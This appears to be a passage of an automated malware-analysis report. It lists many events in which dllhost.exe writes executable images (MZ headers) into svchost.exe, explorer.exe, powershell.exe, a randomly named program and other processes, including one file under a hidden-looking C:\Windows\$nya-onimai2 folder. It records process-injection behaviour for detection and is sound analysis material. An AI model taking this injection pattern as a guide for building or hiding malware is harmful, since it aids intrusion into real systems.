Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2825F1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AA5E060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20BAEC90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: ED0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C782530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24066EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: A80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 181CEDB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A142790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 23A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 195B6F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DCD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2F10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973830000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DBF9DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 830000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A239D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17CFA390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 850000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FB7270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF53B50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 164E88A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25177B50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28D5D340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 24EB5E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F153C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 192913B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D241D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16FADAD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 20E03070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15204DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 139F96A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 9850000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 175C5280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22EF1B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 261DE4D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 226D8930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13E5E930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F843DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B469900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\$nya-onimai2\qVrKPA.exe base: 1910E810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 227C08C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27234C50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28543540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 2B684340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 247B4700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1DAD8A40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE3F3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EC87880000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1C39C960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 10C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 20F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 25D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 15D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 26D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 3040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2C10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 11E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 30C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 28E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 29F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2330000 value starts with: 4D5A
